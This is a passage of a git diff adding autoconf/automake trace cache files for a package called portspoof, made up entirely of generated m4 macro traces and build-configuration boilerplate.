AC_MSG_ERROR([newly created file is older than distributed files! +Check your system clock]) +fi +AC_MSG_RESULT(yes)]) +m4trace:/usr/share/aclocal-1.11/silent.m4:14: -1- AC_DEFUN([AM_SILENT_RULES], [AC_ARG_ENABLE([silent-rules], +[ --enable-silent-rules less verbose build output (undo: `make V=1') + --disable-silent-rules verbose build output (undo: `make V=0')]) +case $enable_silent_rules in +yes) AM_DEFAULT_VERBOSITY=0;; +no) AM_DEFAULT_VERBOSITY=1;; +*) AM_DEFAULT_VERBOSITY=m4_if([$1], [yes], [0], [1]);; +esac +AC_SUBST([AM_DEFAULT_VERBOSITY])dnl +AM_BACKSLASH='\' +AC_SUBST([AM_BACKSLASH])dnl +_AM_SUBST_NOTMAKE([AM_BACKSLASH])dnl +]) +m4trace:/usr/share/aclocal-1.11/strip.m4:17: -1- AC_DEFUN([AM_PROG_INSTALL_STRIP], [AC_REQUIRE([AM_PROG_INSTALL_SH])dnl +# Installed binaries are usually stripped using `strip' when the user +# run `make install-strip'. However `strip' might not be the right +# tool to use in cross-compilation environments, therefore Automake +# will honor the `STRIP' environment variable to overrule this program. +dnl Don't test for $cross_compiling = yes, because it might be `maybe'. +if test "$cross_compiling" != no; then + AC_CHECK_TOOL([STRIP], [strip], :) +fi +INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" +AC_SUBST([INSTALL_STRIP_PROGRAM])]) +m4trace:/usr/share/aclocal-1.11/substnot.m4:14: -1- AC_DEFUN([_AM_SUBST_NOTMAKE]) +m4trace:/usr/share/aclocal-1.11/substnot.m4:19: -1- AC_DEFUN([AM_SUBST_NOTMAKE], [_AM_SUBST_NOTMAKE($@)]) +m4trace:/usr/share/aclocal-1.11/tar.m4:24: -1- AC_DEFUN([_AM_PROG_TAR], [# Always define AMTAR for backward compatibility. +AM_MISSING_PROG([AMTAR], [tar]) +m4_if([$1], [v7], + [am__tar='${AMTAR} chof - "$$tardir"'; am__untar='${AMTAR} xf -'], + [m4_case([$1], [ustar],, [pax],, + [m4_fatal([Unknown tar format])]) +AC_MSG_CHECKING([how to create a $1 tar archive]) +# Loop over all known methods to create a tar archive until one works. +_am_tools='gnutar m4_if([$1], [ustar], [plaintar]) pax cpio none' +_am_tools=${am_cv_prog_tar_$1-$_am_tools} +# Do not fold the above two line into one, because Tru64 sh and +# Solaris sh will not grok spaces in the rhs of `-'. +for _am_tool in $_am_tools +do + case $_am_tool in + gnutar) + for _am_tar in tar gnutar gtar; + do + AM_RUN_LOG([$_am_tar --version]) && break + done + am__tar="$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - "'"$$tardir"' + am__tar_="$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - "'"$tardir"' + am__untar="$_am_tar -xf -" + ;; + plaintar) + # Must skip GNU tar: if it does not support --format= it doesn't create + # ustar tarball either. + (tar --version) >/dev/null 2>&1 && continue + am__tar='tar chf - "$$tardir"' + am__tar_='tar chf - "$tardir"' + am__untar='tar xf -' + ;; + pax) + am__tar='pax -L -x $1 -w "$$tardir"' + am__tar_='pax -L -x $1 -w "$tardir"' + am__untar='pax -r' + ;; + cpio) + am__tar='find "$$tardir" -print | cpio -o -H $1 -L' + am__tar_='find "$tardir" -print | cpio -o -H $1 -L' + am__untar='cpio -i -H $1 -d' + ;; + none) + am__tar=false + am__tar_=false + am__untar=false + ;; + esac + + # If the value was cached, stop now. We just wanted to have am__tar + # and am__untar set. + test -n "${am_cv_prog_tar_$1}" && break + + # tar/untar a dummy directory, and stop if the command works + rm -rf conftest.dir + mkdir conftest.dir + echo GrepMe > conftest.dir/file + AM_RUN_LOG([tardir=conftest.dir && eval $am__tar_ >conftest.tar]) + rm -rf conftest.dir + if test -s conftest.tar; then + AM_RUN_LOG([$am__untar /dev/null 2>&1 && break + fi +done +rm -rf conftest.dir + +AC_CACHE_VAL([am_cv_prog_tar_$1], [am_cv_prog_tar_$1=$_am_tool]) +AC_MSG_RESULT([$am_cv_prog_tar_$1])]) +AC_SUBST([am__tar]) +AC_SUBST([am__untar]) +]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^_?A[CHUM]_]) +m4trace:configure.in:7: -1- m4_pattern_forbid([_AC_]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^LIBOBJS$], [do not use LIBOBJS directly, use AC_LIBOBJ (see section `AC_LIBOBJ vs LIBOBJS']) +m4trace:configure.in:7: -1- m4_pattern_allow([^AS_FLAGS$]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^_?m4_]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^dnl$]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^_?AS_]) +m4trace:configure.in:7: -1- m4_pattern_allow([^SHELL$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PATH_SEPARATOR$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_NAME$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_TARNAME$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_VERSION$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_STRING$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_BUGREPORT$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_URL$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^exec_prefix$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^prefix$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^program_transform_name$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^bindir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^sbindir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^libexecdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^datarootdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^datadir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^sysconfdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^sharedstatedir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^localstatedir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^includedir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^oldincludedir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^docdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^infodir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^htmldir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^dvidir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^pdfdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^psdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^libdir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^localedir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^mandir$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_NAME$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_TARNAME$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_VERSION$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_STRING$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_BUGREPORT$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_URL$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^DEFS$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^ECHO_C$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^ECHO_N$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^ECHO_T$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^LIBS$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^build_alias$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^host_alias$]) +m4trace:configure.in:7: -1- m4_pattern_allow([^target_alias$]) +m4trace:configure.in:11: -1- AM_INIT_AUTOMAKE([portspoof], [1.0]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AM_[A-Z]+FLAGS$]) +m4trace:configure.in:11: -1- AM_SET_CURRENT_AUTOMAKE_VERSION +m4trace:configure.in:11: -1- AM_AUTOMAKE_VERSION([1.11.1]) +m4trace:configure.in:11: -1- _AM_AUTOCONF_VERSION([2.65]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_PROGRAM$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_SCRIPT$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_DATA$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__isrc$]) +m4trace:configure.in:11: -1- _AM_SUBST_NOTMAKE([am__isrc]) +m4trace:configure.in:11: -1- m4_pattern_allow([^CYGPATH_W$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^PACKAGE$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^VERSION$]) +m4trace:configure.in:11: -1- _AM_IF_OPTION([no-define], [], [AC_DEFINE_UNQUOTED(PACKAGE, "$PACKAGE", [Name of package]) + AC_DEFINE_UNQUOTED(VERSION, "$VERSION", [Version number of package])]) +m4trace:configure.in:11: -2- _AM_MANGLE_OPTION([no-define]) +m4trace:configure.in:11: -1- m4_pattern_allow([^PACKAGE$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^VERSION$]) +m4trace:configure.in:11: -1- AM_SANITY_CHECK +m4trace:configure.in:11: -1- AM_MISSING_PROG([ACLOCAL], [aclocal-${am__api_version}]) +m4trace:configure.in:11: -1- AM_MISSING_HAS_RUN +m4trace:configure.in:11: -1- AM_AUX_DIR_EXPAND +m4trace:configure.in:11: -1- m4_pattern_allow([^ACLOCAL$]) +m4trace:configure.in:11: -1- AM_MISSING_PROG([AUTOCONF], [autoconf]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AUTOCONF$]) +m4trace:configure.in:11: -1- AM_MISSING_PROG([AUTOMAKE], [automake-${am__api_version}]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AUTOMAKE$]) +m4trace:configure.in:11: -1- AM_MISSING_PROG([AUTOHEADER], [autoheader]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AUTOHEADER$]) +m4trace:configure.in:11: -1- AM_MISSING_PROG([MAKEINFO], [makeinfo]) +m4trace:configure.in:11: -1- m4_pattern_allow([^MAKEINFO$]) +m4trace:configure.in:11: -1- AM_PROG_INSTALL_SH +m4trace:configure.in:11: -1- m4_pattern_allow([^install_sh$]) +m4trace:configure.in:11: -1- AM_PROG_INSTALL_STRIP +m4trace:configure.in:11: -1- m4_pattern_allow([^STRIP$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_STRIP_PROGRAM$]) +m4trace:configure.in:11: -1- AM_PROG_MKDIR_P +m4trace:configure.in:11: -1- m4_pattern_allow([^MKDIR_P$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^mkdir_p$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AWK$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^SET_MAKE$]) +m4trace:configure.in:11: -1- AM_SET_LEADING_DOT +m4trace:configure.in:11: -1- m4_pattern_allow([^am__leading_dot$]) +m4trace:configure.in:11: -1- _AM_IF_OPTION([tar-ustar], [_AM_PROG_TAR([ustar])], [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])], + [_AM_PROG_TAR([v7])])]) +m4trace:configure.in:11: -2- _AM_MANGLE_OPTION([tar-ustar]) +m4trace:configure.in:11: -1- _AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])], [_AM_PROG_TAR([v7])]) +m4trace:configure.in:11: -2- _AM_MANGLE_OPTION([tar-pax]) +m4trace:configure.in:11: -1- _AM_PROG_TAR([v7]) +m4trace:configure.in:11: -1- AM_MISSING_PROG([AMTAR], [tar]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AMTAR$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__tar$]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__untar$]) +m4trace:configure.in:11: -1- _AM_IF_OPTION([no-dependencies], [], [AC_PROVIDE_IFELSE([AC_PROG_CC], + [_AM_DEPENDENCIES(CC)], + [define([AC_PROG_CC], + defn([AC_PROG_CC])[_AM_DEPENDENCIES(CC)])])dnl +AC_PROVIDE_IFELSE([AC_PROG_CXX], + [_AM_DEPENDENCIES(CXX)], + [define([AC_PROG_CXX], + defn([AC_PROG_CXX])[_AM_DEPENDENCIES(CXX)])])dnl +AC_PROVIDE_IFELSE([AC_PROG_OBJC], + [_AM_DEPENDENCIES(OBJC)], + [define([AC_PROG_OBJC], + defn([AC_PROG_OBJC])[_AM_DEPENDENCIES(OBJC)])])dnl +]) +m4trace:configure.in:11: -2- _AM_MANGLE_OPTION([no-dependencies]) +m4trace:configure.in:11: -1- _AM_IF_OPTION([silent-rules], [AC_REQUIRE([AM_SILENT_RULES])]) +m4trace:configure.in:11: -2- _AM_MANGLE_OPTION([silent-rules]) +m4trace:configure.in:14: -1- m4_pattern_allow([^_GNU_SOURCE$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build_cpu$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build_vendor$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build_os$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host_cpu$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host_vendor$]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host_os$]) +m4trace:configure.in:19: -1- m4_pattern_allow([^host$]) +m4trace:configure.in:24: -1- m4_pattern_allow([^LINUX$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXX$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXXFLAGS$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^LDFLAGS$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^LIBS$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CPPFLAGS$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXX$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^ac_ct_CXX$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^EXEEXT$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^OBJEXT$]) +m4trace:configure.in:29: -1- _AM_DEPENDENCIES([CXX]) +m4trace:configure.in:29: -1- AM_SET_DEPDIR +m4trace:configure.in:29: -1- m4_pattern_allow([^DEPDIR$]) +m4trace:configure.in:29: -1- AM_OUTPUT_DEPENDENCY_COMMANDS +m4trace:configure.in:29: -1- AM_MAKE_INCLUDE +m4trace:configure.in:29: -1- m4_pattern_allow([^am__include$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__quote$]) +m4trace:configure.in:29: -1- AM_DEP_TRACK +m4trace:configure.in:29: -1- AM_CONDITIONAL([AMDEP], [test "x$enable_dependency_tracking" != xno]) +m4trace:configure.in:29: -1- m4_pattern_allow([^AMDEP_TRUE$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^AMDEP_FALSE$]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([AMDEP_TRUE]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([AMDEP_FALSE]) +m4trace:configure.in:29: -1- m4_pattern_allow([^AMDEPBACKSLASH$]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([AMDEPBACKSLASH]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXXDEPMODE$]) +m4trace:configure.in:29: -1- AM_CONDITIONAL([am__fastdepCXX], [ + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CXX_dependencies_compiler_type" = gcc3]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__fastdepCXX_TRUE$]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__fastdepCXX_FALSE$]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([am__fastdepCXX_TRUE]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([am__fastdepCXX_FALSE]) +m4trace:configure.in:30: -1- AM_PROG_CC_C_O +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CFLAGS$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^LDFLAGS$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^LIBS$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CPPFLAGS$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^ac_ct_CC$]) +m4trace:configure.in:30: -1- _AM_DEPENDENCIES([CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CCDEPMODE$]) +m4trace:configure.in:30: -1- AM_CONDITIONAL([am__fastdepCC], [ + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CC_dependencies_compiler_type" = gcc3]) +m4trace:configure.in:30: -1- m4_pattern_allow([^am__fastdepCC_TRUE$]) +m4trace:configure.in:30: -1- m4_pattern_allow([^am__fastdepCC_FALSE$]) +m4trace:configure.in:30: -1- _AM_SUBST_NOTMAKE([am__fastdepCC_TRUE]) +m4trace:configure.in:30: -1- _AM_SUBST_NOTMAKE([am__fastdepCC_FALSE]) +m4trace:configure.in:30: -1- m4_pattern_allow([^NO_MINUS_C_MINUS_O$]) +m4trace:configure.in:32: -1- m4_pattern_allow([^SET_MAKE$]) +m4trace:configure.in:37: -1- m4_pattern_allow([^CPP$]) +m4trace:configure.in:37: -1- m4_pattern_allow([^CPPFLAGS$]) +m4trace:configure.in:37: -1- m4_pattern_allow([^CPP$]) +m4trace:configure.in:37: -1- m4_pattern_allow([^GREP$]) +m4trace:configure.in:37: -1- m4_pattern_allow([^EGREP$]) +m4trace:configure.in:37: -1- m4_pattern_allow([^STDC_HEADERS$]) +m4trace:configure.in:38: -1- m4_pattern_allow([^HAVE_SYS_WAIT_H$]) +m4trace:configure.in:42: -1- m4_pattern_allow([^const$]) +m4trace:configure.in:43: -1- m4_pattern_allow([^size_t$]) +m4trace:configure.in:46: -1- m4_pattern_allow([^HAVE_STDLIB_H$]) +m4trace:configure.in:46: -1- m4_pattern_allow([^HAVE_MALLOC$]) +m4trace:configure.in:46: -1- m4_pattern_allow([^HAVE_MALLOC$]) +m4trace:configure.in:46: -1- m4_pattern_allow([^LIB@&t@OBJS$]) +m4trace:configure.in:46: -1- m4_pattern_allow([^malloc$]) +m4trace:configure.in:50: -1- m4_pattern_allow([^LIB@&t@OBJS$]) +m4trace:configure.in:50: -1- m4_pattern_allow([^LTLIBOBJS$]) +m4trace:configure.in:50: -1- AM_CONDITIONAL([am__EXEEXT], [test -n "$EXEEXT"]) +m4trace:configure.in:50: -1- m4_pattern_allow([^am__EXEEXT_TRUE$]) +m4trace:configure.in:50: -1- m4_pattern_allow([^am__EXEEXT_FALSE$]) +m4trace:configure.in:50: -1- _AM_SUBST_NOTMAKE([am__EXEEXT_TRUE]) +m4trace:configure.in:50: -1- _AM_SUBST_NOTMAKE([am__EXEEXT_FALSE]) +m4trace:configure.in:50: -1- _AC_AM_CONFIG_HEADER_HOOK(["$ac_file"]) +m4trace:configure.in:50: -1- _AM_OUTPUT_DEPENDENCY_COMMANDS diff --git a/autom4te.cache/traces.1 b/autom4te.cache/traces.1 new file mode 100644 index 0000000..36b0dcd --- /dev/null +++ b/autom4te.cache/traces.1 @@ -0,0 +1,512 @@ +m4trace:configure.in:7: -1- AC_INIT([portspoof], [1.0], [piotr[at]duszynski.eu]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^_?A[CHUM]_]) +m4trace:configure.in:7: -1- m4_pattern_forbid([_AC_]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^LIBOBJS$], [do not use LIBOBJS directly, use AC_LIBOBJ (see section `AC_LIBOBJ vs LIBOBJS']) +m4trace:configure.in:7: -1- m4_pattern_allow([^AS_FLAGS$]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^_?m4_]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^dnl$]) +m4trace:configure.in:7: -1- m4_pattern_forbid([^_?AS_]) +m4trace:configure.in:7: -1- AC_SUBST([SHELL]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([SHELL]) +m4trace:configure.in:7: -1- m4_pattern_allow([^SHELL$]) +m4trace:configure.in:7: -1- AC_SUBST([PATH_SEPARATOR]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PATH_SEPARATOR]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PATH_SEPARATOR$]) +m4trace:configure.in:7: -1- AC_SUBST([PACKAGE_NAME], [m4_ifdef([AC_PACKAGE_NAME], ['AC_PACKAGE_NAME'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PACKAGE_NAME]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_NAME$]) +m4trace:configure.in:7: -1- AC_SUBST([PACKAGE_TARNAME], [m4_ifdef([AC_PACKAGE_TARNAME], ['AC_PACKAGE_TARNAME'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PACKAGE_TARNAME]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_TARNAME$]) +m4trace:configure.in:7: -1- AC_SUBST([PACKAGE_VERSION], [m4_ifdef([AC_PACKAGE_VERSION], ['AC_PACKAGE_VERSION'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PACKAGE_VERSION]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_VERSION$]) +m4trace:configure.in:7: -1- AC_SUBST([PACKAGE_STRING], [m4_ifdef([AC_PACKAGE_STRING], ['AC_PACKAGE_STRING'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PACKAGE_STRING]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_STRING$]) +m4trace:configure.in:7: -1- AC_SUBST([PACKAGE_BUGREPORT], [m4_ifdef([AC_PACKAGE_BUGREPORT], ['AC_PACKAGE_BUGREPORT'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PACKAGE_BUGREPORT]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_BUGREPORT$]) +m4trace:configure.in:7: -1- AC_SUBST([PACKAGE_URL], [m4_ifdef([AC_PACKAGE_URL], ['AC_PACKAGE_URL'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([PACKAGE_URL]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_URL$]) +m4trace:configure.in:7: -1- AC_SUBST([exec_prefix], [NONE]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([exec_prefix]) +m4trace:configure.in:7: -1- m4_pattern_allow([^exec_prefix$]) +m4trace:configure.in:7: -1- AC_SUBST([prefix], [NONE]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([prefix]) +m4trace:configure.in:7: -1- m4_pattern_allow([^prefix$]) +m4trace:configure.in:7: -1- AC_SUBST([program_transform_name], [s,x,x,]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([program_transform_name]) +m4trace:configure.in:7: -1- m4_pattern_allow([^program_transform_name$]) +m4trace:configure.in:7: -1- AC_SUBST([bindir], ['${exec_prefix}/bin']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([bindir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^bindir$]) +m4trace:configure.in:7: -1- AC_SUBST([sbindir], ['${exec_prefix}/sbin']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([sbindir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^sbindir$]) +m4trace:configure.in:7: -1- AC_SUBST([libexecdir], ['${exec_prefix}/libexec']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([libexecdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^libexecdir$]) +m4trace:configure.in:7: -1- AC_SUBST([datarootdir], ['${prefix}/share']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([datarootdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^datarootdir$]) +m4trace:configure.in:7: -1- AC_SUBST([datadir], ['${datarootdir}']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([datadir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^datadir$]) +m4trace:configure.in:7: -1- AC_SUBST([sysconfdir], ['${prefix}/etc']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([sysconfdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^sysconfdir$]) +m4trace:configure.in:7: -1- AC_SUBST([sharedstatedir], ['${prefix}/com']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([sharedstatedir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^sharedstatedir$]) +m4trace:configure.in:7: -1- AC_SUBST([localstatedir], ['${prefix}/var']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([localstatedir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^localstatedir$]) +m4trace:configure.in:7: -1- AC_SUBST([includedir], ['${prefix}/include']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([includedir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^includedir$]) +m4trace:configure.in:7: -1- AC_SUBST([oldincludedir], ['/usr/include']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([oldincludedir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^oldincludedir$]) +m4trace:configure.in:7: -1- AC_SUBST([docdir], [m4_ifset([AC_PACKAGE_TARNAME], + ['${datarootdir}/doc/${PACKAGE_TARNAME}'], + ['${datarootdir}/doc/${PACKAGE}'])]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([docdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^docdir$]) +m4trace:configure.in:7: -1- AC_SUBST([infodir], ['${datarootdir}/info']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([infodir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^infodir$]) +m4trace:configure.in:7: -1- AC_SUBST([htmldir], ['${docdir}']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([htmldir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^htmldir$]) +m4trace:configure.in:7: -1- AC_SUBST([dvidir], ['${docdir}']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([dvidir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^dvidir$]) +m4trace:configure.in:7: -1- AC_SUBST([pdfdir], ['${docdir}']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([pdfdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^pdfdir$]) +m4trace:configure.in:7: -1- AC_SUBST([psdir], ['${docdir}']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([psdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^psdir$]) +m4trace:configure.in:7: -1- AC_SUBST([libdir], ['${exec_prefix}/lib']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([libdir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^libdir$]) +m4trace:configure.in:7: -1- AC_SUBST([localedir], ['${datarootdir}/locale']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([localedir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^localedir$]) +m4trace:configure.in:7: -1- AC_SUBST([mandir], ['${datarootdir}/man']) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([mandir]) +m4trace:configure.in:7: -1- m4_pattern_allow([^mandir$]) +m4trace:configure.in:7: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE_NAME]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_NAME$]) +m4trace:configure.in:7: -1- AH_OUTPUT([PACKAGE_NAME], [/* Define to the full name of this package. */ +@%:@undef PACKAGE_NAME]) +m4trace:configure.in:7: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE_TARNAME]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_TARNAME$]) +m4trace:configure.in:7: -1- AH_OUTPUT([PACKAGE_TARNAME], [/* Define to the one symbol short name of this package. */ +@%:@undef PACKAGE_TARNAME]) +m4trace:configure.in:7: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE_VERSION]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_VERSION$]) +m4trace:configure.in:7: -1- AH_OUTPUT([PACKAGE_VERSION], [/* Define to the version of this package. */ +@%:@undef PACKAGE_VERSION]) +m4trace:configure.in:7: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE_STRING]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_STRING$]) +m4trace:configure.in:7: -1- AH_OUTPUT([PACKAGE_STRING], [/* Define to the full name and version of this package. */ +@%:@undef PACKAGE_STRING]) +m4trace:configure.in:7: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE_BUGREPORT]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_BUGREPORT$]) +m4trace:configure.in:7: -1- AH_OUTPUT([PACKAGE_BUGREPORT], [/* Define to the address where bug reports for this package should be sent. */ +@%:@undef PACKAGE_BUGREPORT]) +m4trace:configure.in:7: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE_URL]) +m4trace:configure.in:7: -1- m4_pattern_allow([^PACKAGE_URL$]) +m4trace:configure.in:7: -1- AH_OUTPUT([PACKAGE_URL], [/* Define to the home page for this package. */ +@%:@undef PACKAGE_URL]) +m4trace:configure.in:7: -1- AC_SUBST([DEFS]) +m4trace:configure.in:7: 